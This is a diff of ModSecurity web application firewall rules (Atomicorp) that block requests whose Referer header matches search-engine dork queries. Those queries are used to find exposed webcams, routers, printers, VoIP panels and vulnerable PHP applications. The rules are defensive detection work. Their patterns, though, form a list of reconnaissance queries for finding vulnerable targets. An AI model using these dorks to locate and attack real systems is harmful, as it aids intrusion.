+SecRule REQUEST_HEADERS:Referer   "intitle:summit management interface -georgewbush\.org\.uk" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:snoie intel web netport manager or intitle:intel web netport manager setup/status" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:iqeye302 \| iqeye303 \| iqeye601 \| iqeye602 \| iqeye603 intitle:live images" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:biromsoft webcam -4\.0 -serial -ask -crack -software -a -the -build -download -v4 -3\.01 -numrange:1-10000" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372092,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:netcam intitle:user login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372093,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:orite ic301 \| intitle:orite audio ip-camera ic-301 -the -a" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372094,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:netcam live image -\.edu -\.gov -johnny\.ihackstuff\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372097,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:intellinet intitle:ip camera homepage" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372098,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:hp procurve switch \* this product requires a frame capable browser\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372102,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:v1 welcome to phone settings password" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:veo observer web client" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:middle frame of videoconference management system ext:htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:tandberg this page requires a frame capable browser!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:gcc webadmin -gcc\.ru" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:netopia router \(\*\.\)to view this site" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372119,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\( intitle:packetshaper login\)\|\(intitle:packetshaper customer login\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372120,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:packetshaper customer login " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372121,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:interjak web manager" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372127,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:sww link please wait\.\.\.\.\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372128,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:freifunk\.net - status -site:commando\.de" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372130,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:dhtml intitle:document centre\|\(home\) or intitle:xerox" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372131,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:neronet - burning online" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372133,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "about winamp web interface intitle:winamp web interface" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:jdewshlp welcome to the embedded web server!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372138,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:officeconnect wireless 11g access point checking your browser" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372141,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:actiontec main setup status copyright 2001 actiontec electronics inc" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372143,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:borderware mxtreme mail firewall login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372144,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:service managed gateway login " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372145,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:asterisk\.management\.portal web-access" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372147,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:homeseer\.web\.control \| home\.status\.events\.log" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:active webcam page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:supervisioncam protocol" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:linksys site:ourlinksys\.com " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:default_config - hp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:switch login ibm fast ethernet desktop" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:epsonnet webassist rev" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372161,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:everfocus\.edsr\.applet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372162,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:browser launch page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372165,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:setup home you will need \* log in before \* \* change \* settings" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372168,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:speedstream \* management interface" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372171,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:sipura\.spa\.configuration -\.pdf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372172,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ivista\.main\.page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372175,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:audiorequest\.web\.server" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372177,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:v-gear bee" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372178,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:live netsnap cam-server feed" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372179,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ipcop - main" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372187,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:cisco systems" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372191,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:home xerox corporation refresh status" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372194,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "webcontrol intitle:amx netlinx" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "please visit intitle:i-catcher console copyright icode systems" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:toshiba network camera - user login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372197,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:dvr web client" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372200,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:default_config - hp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372206,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:switch home page cisco systems telnet - to" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372207,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:axis storpoint cd intitle:ip address" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372208,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:remote ui:top page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372211,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:lantronix web-manager" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372212,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ricoh intitle:network administration" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372213,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:the axis 200 home page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372217,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:dreambox web " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372219,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:bordermanager information alert" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372226,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:live view / - axis" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372227,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:wj-nt104 main page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372229,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:view and configure phaserlink" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372235,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login to cacti" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372375,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login to cacti" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372389,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:owl intranet \* owl 0\.82" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "search projects intitle:the ultimate project website" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372460,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:admbook intitle:version filetype:\.?php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372492,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ppc engine admin login form" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372526,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:igenus webmail login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372612,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ccms v3\.1 demo pw" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372668,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
+SecMarker END_RECON_CHECKS_INTITLE
+
+SecRule REQUEST_HEADERS:Referer "(?:powered|power by)"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:333933,chain,phase:2,pass,nolog,noauditlog,skip:1"
+SecRule REQUEST_HEADERS:Referer "@pm 2532|gigs 6rbscript ac4p.com adobe aih aj albinator alitalk amcms3 and aqua arab atomic basic bigace bitweaver blog:cms blogcms blur6ex bp buddy bug burning by by: clanadmin clantiger claroline [clipbucket clipshare cms cmscout cms.ge comdev comersus connectix contact coppermine cpcommerce crownweb.net! cubecart cutenews dayfox db dejcom deluxebb deonixscripts.com digital directory discuz! dodo dolphin dorsacms drake dreamaccount ducalendar duclassified duclassmate dudirectory dudownload dupaypal dwmail easysitenetwork eclime.com egorix egyplus elite elitius elvin epay esmile exophpdesk exv2 ezcms ezguestbook f3site fantastic flexphpnews flinx forums free freewebshop freewebshop.org funkboard gbook gcards gelato ggcms gradman gravity grayscale guestbook guruscript.com hashe help hit hosting how2asp iboutique ilias imgallery indexu info in(?:text|body):powered invision iriran.net is iscripts jamm jaws jmdcms.com jshop kaibb land leap lifetype lightblog lightneasy link lionmax litecommerce lore loudblog maian mailgust marinet mcgallerypro mdforum merak mercuryboard metinfo midmart minb mobilelib mobpartner modx mojoportal monster my myhobbysite myphp myupb ninja nocc novaboard nukedit one-news online open openbsd opencart orbis oscmax oscommerce pageadmin pbboard© pc4uploader pcpin.com photokorn php phpbasket phpcc phpdug phpfanbase phpfm phpfm.*filetype.php phpizabi phpmyrealty phpnuke.ir phpopentracker php-update pligg plogger! pmos power |power powered +powered pppblog profitcode projectcms punbb qt-cute quick.cart quick.cms ramaas real-estate-website rw::download scratcher scripteen seditio sendcard shadowed shop-script shoutstats shutter silvernews simpleview simplicity papoo limbo simplog siteengine sitellite slaed smf software soop teamcal textads thwboard tikiwiki tinyphpforum totalindex ts tsep ucenter uebimiau ugia unak-cms uno.com.my upb softdirec virtual visinia vsns web webcamxp webcards webinspire webspell webtext wikyblog wonderedit words wpquiz www.aspportal.net x7 x-cart: xcomic xhp xmb xt-commerce yelldl yes yourtube zomplog zylone phpbb lionmax wiz raidenhttpd clipbucket redkernel ilohamail sharing jetbox jetstream x-cart hosting mvblog subdreamer vbulletin visiongs alitalk e107 phorum nitropowered jnshosts sijio sports"  "t:none,t:urlDecodeUni,t:htmlEntityDecode"
+SecAction "phase:2,id:333794,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_POWERED"
+
+SecRule REQUEST_HEADERS:Referer   "power by donghungx\. copyright © 2008 attmp3\.com\. all rights reserved\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372860,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer  "powered by: iriran\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350031,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: IRIran eshop builder SQL injection Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "powered by vsns lemon.*intitle:.*vsns lemon" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350025,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "powered by 6rbscript" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350022,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "powered by gravity board" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:351100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Gravity Board Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "powered by silvernews" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: SilverNews Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "powered.*phpbb.*2\.0\.\ inurl\:" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350002,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHPBB 2.0 Search Engine Recon attempt'"
+
+SecRule REQUEST_HEADERS:Referer   "powered by phpfm filetype:\.?php -username" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371033,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by ezguestbook" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by link department" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dupaypal -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371074,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by web wiz journal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dudownload -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371082,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
